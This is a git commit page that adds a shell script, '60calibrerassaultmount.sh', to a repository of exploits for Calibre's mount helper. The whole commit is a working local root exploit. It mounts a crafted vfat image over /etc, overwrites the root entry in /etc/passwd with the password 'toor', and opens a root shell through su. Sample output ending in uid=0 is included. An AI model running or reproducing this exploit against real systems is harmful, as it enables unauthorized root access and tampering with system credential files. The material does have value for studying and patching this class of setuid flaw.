diff options
| author |   Jason A. Donenfeld <Jason@zx2c4.com> | 2011-11-02 20:07:49 -0400 |
|---|---|---|
| committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2011-11-02 20:07:49 -0400 |
| commit | 20c8287ccc88a597a3e5c8d497273d28b3f7a0d1 (patch) | |
| tree | 8862ad289945c24dabda8a5916a1deac7be643b6 | |
| parent | Initial commit. (diff) | |
| download | calibre-mount-helper-exploit-20c8287ccc88a597a3e5c8d497273d28b3f7a0d1.tar.xz calibre-mount-helper-exploit-20c8287ccc88a597a3e5c8d497273d28b3f7a0d1.zip | |
Add 60 calibrer.
| -rwxr-xr-x | 60calibrerassaultmount.sh | 74 |
1 files changed, 74 insertions, 0 deletions
diff --git a/60calibrerassaultmount.sh b/60calibrerassaultmount.sh new file mode 100755 index 0000000..fb25104 --- /dev/null +++ b/60calibrerassaultmount.sh @@ -0,0 +1,74 @@ +#!/bin/sh + + ####################################### + # .60-Calibrer Assault Mount # + # by zx2c4 # + ####################################### + +################################################################################ +# Yesterday we learned how Calibre's usage of execlp allowed us to override PATH +# and get root, in my ".50-Calibrer Assault Mount" exploit. Today we exploit a +# more fundumental issue with Calibre's mount helper -- namely, that it allows +# us to mount a vfat filesystem anywhere we want. By mounting a file system +# image over /etc, we are able to tinker /etc/passwd and make the root password +# temporarily "toor". +# +# - zx2c4 +# 2011-11-2 +# +# Usage: +# $ ./60calibrerassaultmount.sh +# [+] Making temporary directory: /tmp/tmp.OGgS0jaoD4 +# [+] Making overlay image: +# 51200+0 records in +# 51200+0 records out +# 26214400 bytes (26 MB) copied, 0.100984 s, 260 MB/s +# mkfs.vfat 3.0.11 (24 Dec 2010) +# [+] Mounting overlay image using calibre-mount-helper. +# [+] Copying /etc into overlay. +# [+] Tampering with overlay's passwd. +# [+] Unmounting overlay image using calibre-mount-helper. +# [+] Mounting overlay to /etc using calibre-mount-helper. +# [+] Asking for root. When prompted for a password, enter 'toor'. +# Password: [typed in toor to the terminal] +# [+] Unmounting /etc using root umount. +# [+] Cleaning up: /tmp/tmp.OGgS0jaoD4 +# [+] Getting shell. +# sh-4.2# id +# uid=0(root) gid=0(root) groups=0(root) +# sh-4.2# whoami +# root +# sh-4.2# +################################################################################ + + +echo "#######################################" +echo "# .60-Calibrer Assault Mount #" +echo "# by zx2c4 #" +echo "#######################################" +echo +echo -n "[+] Making temporary directory: " +dir="$(mktemp -d)" +echo "$dir" +cd "$dir" +echo "[+] Making overlay image:" +dd if=/dev/zero of=overlay count=51200 +/usr/sbin/mkfs.vfat overlay +echo "[+] Mounting overlay image using calibre-mount-helper." +mkdir staging +calibre-mount-helper mount overlay staging +echo "[+] Copying /etc into overlay." +cd staging/ +cp -a /etc/* . 2>/dev/null +echo "[+] Tampering with overlay's passwd." +cat passwd | tail -n +2 > tmp +echo "root:$(echo -n 'toor' | openssl passwd -1 -stdin):0:0:root:/root:/bin/bash" >> tmp +mv tmp passwd +echo "[+] Unmounting overlay image using calibre-mount-helper." +cd .. +calibre-mount-helper eject overlay staging >/dev/null 2>&1 +echo "[+] Mounting overlay to /etc using calibre-mount-helper." +calibre-mount-helper mount overlay /etc >/dev/null 2>&1 +cd / +echo "[+] Asking for root. When prompted for a password, enter 'toor'." +su -c "echo \"[+] Unmounting /etc using root umount.\"; umount /etc; echo \"[+] Cleaning up: $dir\"; rm -rf \"$dir\"; echo \"[+] Getting shell.\"; exec /bin/sh" |